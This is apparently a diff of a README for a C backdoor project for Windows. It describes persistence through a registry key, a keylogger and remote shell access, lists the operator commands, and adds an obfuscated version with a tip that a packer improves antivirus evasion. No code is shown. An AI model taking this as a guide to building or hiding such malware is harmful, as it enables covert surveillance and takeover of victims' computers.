leo9722/backdoor-c/README.md

 # The project :

-The backdoor is functional under Windows and includes a persistent mode, a keylogger and a powershell access.
+The backdoor is functional under Windows and includes a persistent mode, a keylogger and a shell access.

+I also put a 2nd version who is the same backdoor but i obfuscate him. if you using packer you may have a better resistance to A.V !

 ## Command to use it

+- cd : to move another directory when you gain access to your shell
 - persist : to use the persist mode and create an HKEY_CURRENT_KEY
-- keylog_on : ton activate the keylogger
+- keylog : ton activate the keylogger